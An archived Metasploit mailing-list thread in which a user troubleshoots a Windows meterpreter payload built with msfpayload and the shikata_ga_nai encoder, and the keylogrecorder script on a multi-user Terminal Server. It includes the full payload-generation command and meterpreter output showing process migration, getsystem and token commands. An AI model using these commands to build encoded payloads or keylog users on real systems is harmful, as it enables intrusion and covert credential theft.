Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads.

From: Richard Miles <richard.k.miles () googlemail com>
Date: Thu, 2 Dec 2010 18:36:38 -0600
Hi

Nice. Can I have a beta of this smartlocker?

Or can you share insides of details of how you solved this problem?

In special, any idea how to deal when explorer.exe is available and
inject into other process freeze?

Thanks

On Thu, Dec 2, 2010 at 5:47 PM, c0lists <lists () carnal0wnage com> wrote:

Actually mubix and I will be releasing smartlocker shortly that should
handle some of the issues with multiple winlogon sessions.

guess this is a good kick in the butt to do that...

-CG

On Thu, Dec 2, 2010 at 6:17 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:

Hi

I ended unloading my antivirus and I was able to execute mspayload
portable (last release available at Metasploit website), most of the
features works very well, but when I try create a .exe payloads it's
created but not on the correct way. I created using:

C:\Temp\ruby\bin>ruby.exe ..\..\msf3\msfpayload
windows/meterpreter/bind_tcp LHOST=127.0.0.1 R | ruby.exe
..\..\msf3\msfencode -e x86/shikata_ga_nai -t exe > test.exe

[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)

The test.exe was created, but when executed it start and finish
(crash?) on the same second. If I generate the same payload from my
Linux box it works very well. So, I believe it may be a bug.

The other thing that called my attention is keylogrecorder from
Carlos, it doesn't appear to work in Terminal Service environment with
multiple users, See the output:

meterpreter > run keylogrecorder -c 0
[*]     explorer.exe Process found, migrating into 3247
[*] Migration Successful!!
[*]     explorer.exe Process found, migrating into 3622
[-] Error in script: Rex::RuntimeError Cannot migrate into this
process (insufficient privileges)
meterpreter > getuid
Server username: MyDomain\User01
meterpreter > rev2self
meterpreter > getuid
Server username: MyDomain\User01
meterpreter > drop_token
Relinquished token, now running as: MyDomain\User01
meterpreter > getuid
Server username: MyDomain\User01
meterpreter >

It clear finds the first exploit and migrate to it, but it continues
on the loop and try to find the second user to migrate, but it failed
because the previous migrated process is not administrator. I also
tried to revert my privilege to admin with rev2self or drop_token but
it doesn't work.

My workaround was modify the script to look for a specific pid and end
the loop when it found. But, should be nice a patch to fix it
properly. Maybe ask for the name of the user to inject the keylogger,
or maybe restore the older privileges before migrate on the next,
maybe on this way we could keylogger all the sessions at the same
time?

Also, on this server I found a strange situation, where different
sessions do not have a explorer.exe, consequently the script failed. I
found a just a few executables in use for this users. I used pslist
and I got the main process (using tree view - there are 2 main
process), and I modified the keylogger to migrate to this process, but
the crazy is that is just freeze.


meterpreter > getsystem
...got system (via technique 1).
meterpreter > run keylogrecorder -c 0 -t 15
[*]     spshell.exe Process found, migrating into 1980

And it keep on this screen forever.  Depending on the process, it just
get stopped forever on this stage. On the other, it's also get stopped
forever on this stage but the main process day. Anyone have seen
anything like that? Ideas why it happens? How to solve the situation?

I'm unable to view to record the user activity in this case. Anyone
has any suggestion?

Thanks
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: